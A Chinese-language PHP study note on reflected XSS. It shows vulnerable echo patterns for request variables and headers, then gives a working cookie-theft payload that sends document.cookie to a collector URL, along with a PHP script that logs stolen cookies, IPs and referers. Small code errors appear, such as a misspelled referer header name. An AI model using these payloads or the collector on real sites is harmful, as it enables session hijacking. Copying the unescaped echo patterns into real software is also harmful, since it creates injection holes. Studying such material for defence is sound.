XSS 反射型漏洞 · PHP筆記

**xss 漏洞大致分三種** * 反射型 XSS 漏洞 * 保存型 XSS 漏洞 * 基于 DOM 的 XSS 漏洞反射型 XSS 漏洞它通過給別人發送帶有惡意腳本代碼參數的 URL，當 URL 地址被打開時，特有的惡意代碼參數被 HTML 解析、執行。它的特點是非持久化，必須用戶點擊帶有特定參數的鏈接才能引起。一：變量的直接輸出 ``` <?php echo $_GET['xss']; ?> ``` ``` //http://localhost/test/ddd.php?p=<script>alert(document.cookie);</script> <?php echo $_GET['p']; ?> ``` **二：$_SERVER 變量參數** $_SERVER['PHP_SELF'] ``` //http://localhost/test/ddd.php/<script>alert(1111);</script> echo $_SERVER['PHP_SELF']; ``` $_SERVER['REQUEST_URI'] ``` //加上urldecode后就會有xss效果 echo urldecode($_SERVER['REQUEST_URI']); ``` $_SERVER['HTTP_USER_AGENT'] ``` //http://localhost/test/ddd.php?<script>alert(1111);</script> echo $_SERVER['PHP_SELF']; //輸出：Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 ``` 怎么讓他輸出xss？為了方便我們將下載瀏覽器插件輔助我們安裝SIMPLE MODIFY HEADERS或者modify header value 插件 ![](https://img.kancloud.cn/12/79/1279d2abda6313ea88e8d455366474b7_1260x467.png) 再次訪問http://localhost/test/ddd.php 即可看到彈窗；modify header value同理 ![](https://img.kancloud.cn/11/76/117620d2b8a47e1920079efaff7b76d1_1330x276.png) $_SERVER['HTTP_REFERER'] 三：http 請求格式 User-Agent: Referer **四：利用** 測試 <script>alert(1);</script> 利用Cookie `<script>var i=new Image;i.src="http://127.0.0.1/xss.php?c="%2bdocument.cookie;</script> ` 具體： ``` 訪問： http://localhost/test/ddd.php?c=<script>var i=new Image;i.src="http://localhost/test/xss.php?c="%2bdocument.cookie;</script> //ddd.php echo $_GET['c']; //xss.php $cookie=$_GET['c']; $ip=getenv ('REMOTE_ADDR'); $time=date ("j F,Y, g: i a"); $referer=getenv ('HTP_REFERER'); $fp = fopen ('cook.txt', 'a'); fwrite($fp, 'Cookie:'.$cookie.'<br> IP:'.$ip.'<br> Date and Time:'.$time.'<br> Referer:'.$referer.'<br><br><br>'); ``` modify headers